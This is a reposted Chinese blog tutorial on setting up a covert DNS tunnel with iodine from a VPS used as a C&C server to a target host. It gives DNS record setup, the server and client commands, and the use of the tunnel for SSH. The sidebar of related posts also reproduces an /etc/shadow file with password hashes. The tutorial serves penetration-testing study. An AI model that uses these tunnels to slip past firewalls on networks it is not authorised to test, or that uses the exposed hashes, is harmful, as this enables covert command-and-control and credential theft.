linux查看dns_内网转发及隐蔽隧道 | 应用层隧道技术之使用DNS搭建隧道(iodine)

最新推荐文章于 2023-08-01 16:15:00 发布
最新推荐文章于 2023-08-01 16:15:00 发布
阅读量468 收藏 1
点赞数
文章标签: linux查看dns linux端口转发 linux设置dns windows 端口转发工具 windows 网卡转发 windows端口转发工具
应用层隧道技术之使用DNS搭建隧道(iodine) d74280428d02a7f5ee3494d503ca9f8a.png

目录

    iodine

    使用iodin搭建隧道

        (1):部署域名解析

        (2):安装并启动服务端

        (3):安装并启动客户端

        (4):使用DNS隧道

d74280428d02a7f5ee3494d503ca9f8a.png

➩iodine

iodine是基于C语言开发的,分为服务端和客户端。iodine支持转发模式和中继模式。其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务器之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。

与同类工具相比,iodine具有如下特点:

  • 不会对下行数据进行编码

  • 支持多平台(Linux、Windows、MacOS)

  • 支持16个并发连接

  • 支持强密码机制

  • 支持同网段隧道IP地质(不同于服务器一客户端网段)

  • 支持多种DNS记录类型

  • 提供了丰富的隧道质量检测措施

使用iodin搭建隧道

1):部署域名解析

首先,用一台公网的Linux系统的VPS作为C&C服务器,并准备好一个可以配置的域名(这里我们假设是hack.com)。然后,去配置域名的记录。首先创建记录A,将自己的域名 www.hack.com 解析到VPS服务器地址。然后,创建NS记录,将 test.hack.com 指向 www.hack.com 。

  • 第一条A类解析是在告诉域名系统,www.hack.com 的IP地址是 xx.xx.xx.xx 。

  • 第二条NS解析是在告诉域名系统,想要知道 test.hack.com 的IP地址,就去问 www.hack.com 。

1ca362ba42269961f31b896aaca867a4.png

为什么要设置NS类型的记录呢?因为NS类型的记录不是用于设置某个域名的DNS服务器的,而是用于设置某个子域名的DNS服务器的。

如何验证域名解析设置是否成功?
在随便一台电脑上ping域名 www.hack.com ,若能ping通,且显示的IP地址是我们配置的VPS的地址,说明第一条A类解析设置成功并已生效。

a4140e6f6d5c1896c2e7c435817b40b7.png

然后在我们的VPS上执行以下命令监听UDP53端口

tcpdump -n -i eth0 udp dst port 53

在任意一台机器上执行  nslookup test.hack.com 命令,如果在我们的VPS监听的端口有查询信息,说明第二条记录设置成功

555785a794dd72170c605133395d31e4.png

(2):安装并启动服务端

Kali中默认安装了iodine,但是我们这里用的服务端是Centos7系统,可以执行命令:yum -y install iodine 安装。如果是Windows系统,可以安装编译好的对应版本的iodine。

ce0280f4f51cd6a8d6ffeb3cfa76fa61.png

执行以下命令启动服务端

iodined -f -c -P root@123456 192.168.100.1 test.hack.com -DD    -f:在前台运行    -c:禁止检查所有传入请求的客户端IP地址    -P:指定密码    -D:指定调试级别。-DD指第二级,D的数量随等级增加    这里的192.168.10.1是自定义的局域网虚拟IP地址

15f4bdb4dd998f070c155b0bd197163a.png

启动完后,可以通过iodine检查页面:https://code.kryo.se/iodine/check-it/  检查配置是否正确。如下,表示设置成功

93f0d1eca7b28a7d82588c11a8865031.png

服务端启动成功后,VPS上多了一块dns0的网卡,ip为我们设置的192.168.100.1

f64dce3f8da210b15faa0a8803177f4c.png

(3):安装并启动客户端

Windows系统

如果是Windows系统,直接执行下面命令启动客户端,但是启动的过程中,会遇到杀毒软件的报毒,并且需要管理员权限执行命令才可以启动

iodine.exe -f -P root@123456 test.hack.com

715fae01119dc937fc0ec91e657af79f.png

78c629995f3fb1ae9d5e780bd97b6c7a.png

那我们现在就以管理员权限运行该命令,如图,DNS隧道建立成功

d62e7e5ae88b324b34c2ec92b8b1672c.png

查看客户端网卡,多了一张以太网2,IP为192.168.100.2。此时,我们的VPS和客户端处在同一个逻辑的局域网内。

5039252cb4eac2188091db28281dbbee.png

但是此时ping服务端的192.168.100.1地址却ping不通,不知为何,客户端如果是Linux则不会有此情况。

639c5de00a43aedb90c8c5d472c9b9b2.png

Linux系统

如果是Linux系统,先安装iodine。上传iodlie客户端到目标主机,解压,进入目录安装

cd iodine-0.7.0/make && make install

4f51948ec014f5f08c7a99c6266edc0a.png

然后执行下面命令连接服务端(需要root权限),如图连接成功。

iodine -f -P root@123456 test.hack.com

070f2c5e10791522bbcf09d382347ac1.png

连接成功后,客户端上新建了一个dns0的网卡,IP地址为192.168.100.2

8abac047a01424bd853ab9ba9fea6842.png

然后ping服务端地址192.168.100.1,能互通!

dfc28a7bfce9df4d963aee5bcab0d488.png

(4):使用DNS隧道

客户端和服务端连接成功后,由于客户端和服务端处在一个逻辑的局域网中,所以可以直接通。

服务端SSH连接客户端

b90fc68258de985815e309cf05e75369.png

客户端SSH连接服务端

809f01328be36b88e168e60e7d8c1b75.png

其他服务也是一样,可以直接指定虚拟局域网的IP和端口就可连接。

相关文章:

内网转发及隐蔽隧道 | 使用DNS进行命令控制(DNS-Shell)

内网转发及隐蔽隧道 | 使用ICMP进行命令控制(Icmpsh)

内网转发及隐蔽隧道 | ICMP隧道(pingTunnel/IcmpTunnel)

内网转发及隐蔽隧道 | 网络层隧道技术之ICMP隧道

内网转发及隐蔽隧道 | 使用SSH做端口转发以及反向隧道

内网转发及隐蔽隧道 | 端口转发和端口映射

内网转发及隐蔽隧道 | 内网转发工具的使用

内网转发及隐蔽隧道 | FRP的使用

内网转发及隐蔽隧道 | NPS的使用


责编:vivian

来源:谢公子博客

78f492c7c94b91fe9d69f2433aa7c988.png 如果文中有错误的地方,欢迎指出。有想转载的,可以留言我加白名单。最后,欢迎加入谢公子的小黑屋(安全交流群)(QQ群:783820465)
weixin_39892481
关注
  • 0
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
dns服务期搭建使用_使用Iodine进行DNS隧道搭建
weixin_28882565的博客
01-02 289
一、源码下载Iodine下载地址 GitHub:https://github.com/yarrick/iodine二、源码编译执行make命令以编译服务端和客户端二进制文件。运行make install以将二进制文件复制到目标目录。运行make test以编译并运行单元测试。编译以后文件如下:在bin目录下,有iodineiodined两个文件,分别为服务端和客户端。三、隧道工具运行(1)、参数...
linux开启局域网端口转发功能
qq_39942956的博客
07-12 270
开启NAT转发 # firewall-cmd --permanent --zone=public --add-masquerade 开放DNS使用的53端口,否则可能导致内网服务器虽然设置正确的DNS,但是依然无法进行域名解析。 # firewall-cmd --zone=public --add-port=53/tcp --permanent 重启防火墙 # systemctl restart firewalld.service # 检查是否允许NAT转发 firewall-cmd --query-mas
Linux运维实战之DNS的高级配置(转发器、视图等)
weixin_33754913的博客
01-23 1996
上次博文我们具体配置了一台DNS服务器并实现了主辅之间的区域传送,本次博文我们来看看DNS的一些高级配置。 在进行DNS的高级配置之前,必须要理解DNS的原理(参见http://sweetpotato.blog.51cto.com/533893/1596973) 并且对DNS的基础配置也要熟练(参见http://sweetpotato.blog.51cto.com/533...
配置nginx方向代理,实现URL隐形转发 (附带nginx配置文件详解)
热门推荐
万博的博客
07-31 2万+
配置nginx方向代理,实现URL隐形转发 (附带nginx配置文件详解) 项目名称:【域名解析–隐形URL转发】–centos 7.3 环境: 阿里云服务器之上有多个tomcat; tomcat的网站基于ip+端口开发+项目名名称。 要求: 访问二级域名http://wanbo.**.cn/跳转至tomcat的web网站,实现隐形URL转发。 方案: nginx代理tomc...
Linux查看/删除隧道命令
St.Jimmy的专栏
09-24 6343
*ip tunnel show
DNS隐蔽隧道数据集包括类别dnscat,iodine、tcpoverdnsdns2tcp、dnshell、normal
最新发布
01-05
DNS隐蔽隧道数据集包括类别cobaltstrike,dnscat,iodine,tcpoverdnsdns2tcp,dnshell,normal 内含原始数据包以及处理后的特征可以直接用于数据的分类。
iodine:一款可快速创建 DNS 隧道工具 该项目包含 C 语言写的 DNS 隧道服务器和客户端,可快速搭建 DNS 隧道
01-06
iodine:一款可快速创建 DNS 隧道工具。该项目包含 C 语言写的 DNS 隧道服务器和客户端,可快速搭建 DNS 隧道传输 IPv4 数据,常用于绕过防火墙等场景。因为一般情况下防火墙的 DNS 端口是打开的,所以将流量伪装...
Iodine DNS隧道流量 自用
03-10
Iodine DNS隧道流量 自用
network:包括两个实验:使用Panabit进行DNS劫持,使用iodine建立DNS隧道穿越网关
04-28
Panabit主要工作在应用层上,采用应用层协议识别的通用技术DPI/DFI。 DPI:深度包检测 DFI:深度流检测 Panabit采用DPI对应用蹭协议特征进行识别判断,并采用独有的“节点跟踪技术+加密协议深度识别引擎”来探测
碘:碘dns隧道的官方git回购
02-21
这可以在防火墙接入Internet但允许DNS查询的不同情况下使用。编译中Iodine没有配置脚本。 如果在/usr/include中找到了相关的头文件,则会自动启用Linux的两个可选功能(SELinux和systemd支持)。 (请参见./src/...
内网渗透系列:内网隧道iodine
闵行小鱼塘
04-09 1190
本文研究DNS隧道的一个经典工具iodine
linux网卡的流量怎么通过c语言获取_通过DNS隧道进行通信 iodine
weixin_39574065的博客
11-25 96
渗透攻击红队一个专注于红队攻击的公众号大家好,这里是渗透攻击红队的第 21 篇文章,本公众号会记录一些我学习红队攻击的复现笔记(由浅到深),不出意外每天一更iodineiodine 可以通过一台 DNS 服务器制造一个 IPv4 数据通道,特别适合在目标主机只能发送 DNS 请求的网络环境使用iodine 是基于 C 语言开发的,分别服务端程序 iodined 和客户端程序 iod...
内网流量操控技术四】DNS隧道iodine
redwand的博客
01-25 629
上篇文章通过dns2tcp实验,学习了绕过防火墙53端口udp协议限制出站策略的原理。但由于dns2tcp是一款在类unix操作系统上使用工具,并不具有跨平台性。在渗透测试中,我们经常会遇到windows操作系统,因此,在原理相同的条件下,一款跨平台的软件就急需我们掌握,这里我们通过实验配置快速学习一下iodine这款dns隧道软件。
Linux避免dns,LinuxDNS的问题
weixin_39691748的博客
05-13 115
该楼层疑似违规已被系统折叠隐藏此楼查看此楼Nov 9 06:36:22 BJ-linux kernel: end_request: I/O error, dev fd0, sector 0Nov 9 06:36:22 BJ-linux kernel: end_request: I/O error, dev fd0, sector 0Nov 9 06:37:06 BJ-linux sy...
DNS+SSH混合隧道实战-------iodine,ssh
小徐的博客
07-30 1233
DNS+SSH混合隧道实战——-iodine,sshDNS+SSH隧道:在DNS隧道中嵌入SSH隧道进行数据传送,实现代理服务器功能。 注:实验环境在vbox中搭建 实验拓扑:拓扑说明:Kali:外网服务器,DNS委派的服务器并做为ssh 和 iodine程序的服务端 ip 192.168.1.114(桥接物理网卡)WIN2003: DNS服务器 ip 192.168.1.110,用于域名解析和
保姆级 DNS 安全隧道中文部署指南
easylife206的专栏
01-01 459
公众号关注「奇妙的 Linux 世界」设为「星标」,每天带你玩转 Linux !一.DNS隧道准备和我哥们在看一个站点的时候,发现是不出网的,但是站点可以做DNS查询,所以想着搭建一个DNS隧道。此篇文章为了读者看起来更加清楚,我的公网服务器与域名都是未打码的,希望各位大佬手下留情。1.DNS隧道介绍DNS隧道,是隧道技术中的一种。当我们的HTTP、HTTPS这样的上层协议、正反向端口转发都...
内网隐藏通信隧道技术——DNS隧道
A_991128a的博客
08-01 1136
在实际的网络中,通常会通过各种边界设备、软/硬件防火墙甚至入侵检测系统来检查对外连接情况,如果发现异样,就会对通信进行阻断。那么什么是隧道呢?这里的隧道,就是一种绕过端口屏蔽的通信方式。防火墙两端的数据包通过防火墙所允许的数据包类型或端口进行封装,然后穿过防火墙,与对方进行通信。当封装的数据包到达目的地时,将数据包还原,并将还原后的数据包发送到相应服务器上。
域渗透(一)-域环境搭建
黑白的博客
04-28 4572
到这里,相信你的域环境也已经成功创建,可以简单做一下调试桥接模式的之间都能ping通,kali服务器ping不通仅主机模式的仅主机模式的之间都能ping通,也能ping通我们设置的域student.comNAT模式可以ping通所有,当然也能ping通我们设置的域student.com其实在这个域环境中,只需要桥接和仅主机两种网络模式就可以模拟内外网,包括DMZ,为什么要单独加一台centos7-1,而且是NAT模式的呢?
应用层隧道技术使用DNS搭建隧道(iodine)
谢公子的博客
02-21 2091
iodine iodine是基于C语言开发的,分为服务端和客户端。iodine支持转发模式和中继模式。其原理是:通过TAP虚拟网卡,在服务端建立一个局域网;在客户端,通过TAP建立一个虚拟网卡;两者通过DNS隧道连接,处于同一个局域网(可以通过ping命令通信)。在客户端和服务器之间建立连接后,客户机上会多出一块名为dns0的虚拟网卡。 与同类工具相比,iodine具有如下特点: 不会对下行...
root:$6$RMpgG8z.$GrGzDK0J1/uXc/Z2WIp6WgIYEB6Bi/Sw2aCc86U2E.BK80mszROf4K1ZB172DOQzgRb6U/2jGPh/8rwXQsbM3/:17277:0:99999:7::: daemon:*:17272:0:99999:7::: bin:*:17272:0:99999:7::: sys:*:17272:0:99999:7::: sync:*:17272:0:99999:7::: games:*:17272:0:99999:7::: man:*:17272:0:99999:7::: lp:*:17272:0:99999:7::: mail:*:17272:0:99999:7::: news:*:17272:0:99999:7::: uucp:*:17272:0:99999:7::: proxy:*:17272:0:99999:7::: www-data:*:17272:0:99999:7::: backup:*:17272:0:99999:7::: list:*:17272:0:99999:7::: irc:*:17272:0:99999:7::: gnats:*:17272:0:99999:7::: nobody:*:17272:0:99999:7::: systemd-timesync:*:17272:0:99999:7::: systemd-network:*:17272:0:99999:7::: systemd-resolve:*:17272:0:99999:7::: systemd-bus-proxy:*:17272:0:99999:7::: _apt:*:17272:0:99999:7::: mysql:!:17272:0:99999:7::: epmd:*:17272:0:99999:7::: Debian-exim:!:17272:0:99999:7::: uuidd:*:17272:0:99999:7::: rwhod:*:17272:0:99999:7::: redsocks:!:17272:0:99999:7::: usbmux:*:17272:0:99999:7::: miredo:*:17272:0:99999:7::: Debian-snmp:!:17272:0:99999:7::: ntp:*:17272:0:99999:7::: stunnel4:!:17272:0:99999:7::: sslh:!:17272:0:99999:7::: rtkit:*:17272:0:99999:7::: postgres:*:17272:0:99999:7::: dnsmasq:*:17272:0:99999:7::: messagebus:*:17272:0:99999:7::: iodine:*:17272:0:99999:7::: arpwatch:!:17272:0:99999:7::: couchdb:*:17272:0:99999:7::: avahi:*:17272:0:99999:7::: sshd:*:17272:0:99999:7::: colord:*:17272:0:99999:7::: saned:*:17272:0:99999:7::: speech-dispatcher:!:17272:0:99999:7::: pulse:*:17272:0:99999:7::: king-phisher:*:17272:0:99999:7::: Debian-gdm:*:17272:0:99999:7::: dradis:*:17272:0:99999:7::: beef-xss:*:17272:0:99999:7::: xrdp:!:17472:0:99999:7::: lightdm:*:17472:0:99999:7::: ctf:$6$d1Y17YhS$P1G.pKFO6VKvKx.y0H7nP5kXAHUAhj6hYroEA.ThT1/kErw37IhVclt.UWCFXrfq/sEZk1jhb52KlPWidJKpp0:17473:0:99999:7:::
07-13
这是一个密码文件(/etc/shadow)的示例。这个文件存储了每个用户的加密密码和其他相关信息。每一行代表一个用户,由多个字段组成,用冒号分隔。字段的含义如下: - 用户名 - 加密后的密码(以 $ 开头) ...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值